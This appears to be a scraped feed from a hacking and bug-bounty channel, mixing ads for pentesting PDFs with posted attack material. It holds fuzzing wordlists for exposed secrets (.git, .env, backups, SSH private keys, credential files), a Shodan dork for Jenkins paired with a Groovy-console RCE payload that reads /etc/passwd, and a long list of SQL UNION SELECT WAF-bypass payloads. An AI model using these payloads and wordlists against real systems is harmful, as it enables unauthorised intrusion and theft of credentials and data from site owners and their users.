🐧_Bash_Script_Cheatsheet_Automate,_Simplify_and_Command_🎯_.pdf
3.8 MB
🐧 Bash Script Cheatsheet – Automate, Simplify & Command! 🎯💻
🔹 Master Bash Scripting – Automate tasks like a pro! ⚡️
🔹 Learn Commands, Loops, Variables & More – Simplify system management! 🛠
🔹 Essential for Hackers, DevOps & SysAdmins! 🚀
🔹 Master Bash Scripting – Automate tasks like a pro! ⚡️
🔹 Learn Commands, Loops, Variables & More – Simplify system management! 🛠
🔹 Essential for Hackers, DevOps & SysAdmins! 🚀
👍6❤5🔥5👏1
Recon like Pro.pdf
1.3 MB
🔍 Master Networking & Recon – The Backbone of Hacking! 💻🔥
1️⃣ Networking is the key to understanding how data moves.
2️⃣ TCP/IP, DNS, and HTTP help uncover vulnerabilities.
3️⃣ Reconnaissance is where real hacking begins! 🕵️♂️
4️⃣ Better Recon = More Bugs, More Payouts! 💰
🚀 Want to level up your Bug Bounty & Recon skills?
1️⃣ Networking is the key to understanding how data moves.
2️⃣ TCP/IP, DNS, and HTTP help uncover vulnerabilities.
3️⃣ Reconnaissance is where real hacking begins! 🕵️♂️
4️⃣ Better Recon = More Bugs, More Payouts! 💰
🚀 Want to level up your Bug Bounty & Recon skills?
👍14❤10🔥5👏2
Top 25 JavaScript Path Files used to store sensitive information in Web Application
01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
🔥30👍10👀4👏1
Sensitive Files by Fuzzing Key .git Paths.
/.git
/.gitkeep
/.git-rewrite
/.gitreview
/.git/HEAD
/.gitconfig
/.git/index
/.git/logs
/.svnignore
/.gitattributes
/.gitmodules
/.svn/entries
⚡10❤6👍2
Configuration and position-sensitive files
config.php
config.json
config.yaml
config.yml
config.ini
config.xml
config.db
configuration.php
database.yml
database.json
database.ini
database.xml
local.config
web.config
application.properties
application.yml
connections.ini
credentials.json
settings.py
settings.xml
app.config
firebase.json
aws-credentials
👍11❤2🔥1
Important environment files and variables
.env
.env.local
.env.dev
.env.production
.env.staging
.env.testing
.env.example
.env.backup
.env.bak
.env.old
.env~
.env.default
/opt/app/.env
/home/user/.env👍10❤2
Backup files and old versions
index.php.bak
config.old
config.bak
database.sql.gz
database_backup.sql
database_dump.sql
database_export.sql
wp-config.php~
.htpasswd.bak
.htpasswd.old
.htaccess.bak
.htaccess.old
admin.bak
backup.zip
backup.tar.gz
backup.sql
backup_old.sql
old_version.zip
old_config.php
👍12❤3
Log and debug files
debug.log
error.log
access.log
server.log
php_errors.log
trace.log
system.log
log.txt
logs/debug.log
logs/error.log
logs/system.log
logs/app.log👍10❤3
Private key files and API keys
id_rsa
id_rsa.pub
id_dsa
id_ecdsa
id_ed25519
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/authorized_keys
secrets.json
apikey.txt
google-cloud.json
aws-credentials
jwt_private.pem
jwt_public.pem
private.key
public.key👍12❤5
Miscellaneous files worth testing
composer.lock
composer.json
package.json
package-lock.json
.bash_history
.bashrc
.zshrc
.gitignore
.gitconfig
.gitattributes
.idea/workspace.xml
.vscode/settings.json
.vscode/launch.json
.vscode/tasks.json
Dockerfile
docker-compose.yml
nginx.conf
apache2.conf
httpd.conf
php.ini
robots.txt
sitemap.xml
sitemap_index.xml
crossdomain.xml
security.txt
CORS⚡9👍5🔥4❤3
Exploit RCE via Groovy Console
Shodan: ssl.cert.subject.cn:*.taarget.com http.title:"Dashboard [Jenkins]"
Payload: println "cat /etc/passwd".execute().text
hashtag#BugBounty hashtag#bugbountytips hashtag#RCE
Shodan: ssl.cert.subject.cn:*.taarget.com http.title:"Dashboard [Jenkins]"
Payload: println "cat /etc/passwd".execute().text
hashtag#BugBounty hashtag#bugbountytips hashtag#RCE
👍25🔥7❤2
hello everyone use this my custom and advance Recon Eging
https://haxshadow.github.io/reconengine/
https://haxshadow.github.io/reconengine/
6🔥39❤6👍3🫡3🥰1
Bypass SQL union select
#Bypass #SQL
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
❤16👍6
Master Wordpress Penetration Testing.pdf
6 MB
🔍 Master WordPress Penetration Testing – Secure & Exploit Like a Pro! 💻🚀
🔹 Learn How to Identify & Exploit WordPress Vulnerabilities! ⚡️
🔹 Master Enumeration, Brute-Force Attacks, Plugin Exploits & More! 🔥
🔹 Understand WordPress Security Best Practices & Hardening Techniques! 🎯
🔹 Essential for Ethical Hackers, Bug Bounty Hunters & Pentesters! 🛠
📖 Expand Your Pentesting Skills!
👉 Complete List of Pentesting & Hacking Tools: https://www.codelivly.com/complete-list-of-penetration-testing-and-hacking-tools
👉 Learn Web Application Pentesting: https://www.codelivly.com/learn-web-app-pentesting/
👉 Hacking Like a Pro – Penetration Testing with Kali Linux: https://www.codelivly.com/hacking-like-a-pro-the-ultimate-guide-to-penetration-testing-with-kali-linux-tools/
🚀 Test Smarter, Hack WordPress & Stay Ahead in Cybersecurity!
🔹 Learn How to Identify & Exploit WordPress Vulnerabilities! ⚡️
🔹 Master Enumeration, Brute-Force Attacks, Plugin Exploits & More! 🔥
🔹 Understand WordPress Security Best Practices & Hardening Techniques! 🎯
🔹 Essential for Ethical Hackers, Bug Bounty Hunters & Pentesters! 🛠
📖 Expand Your Pentesting Skills!
👉 Complete List of Pentesting & Hacking Tools: https://www.codelivly.com/complete-list-of-penetration-testing-and-hacking-tools
👉 Learn Web Application Pentesting: https://www.codelivly.com/learn-web-app-pentesting/
👉 Hacking Like a Pro – Penetration Testing with Kali Linux: https://www.codelivly.com/hacking-like-a-pro-the-ultimate-guide-to-penetration-testing-with-kali-linux-tools/
🚀 Test Smarter, Hack WordPress & Stay Ahead in Cybersecurity!
❤19👍5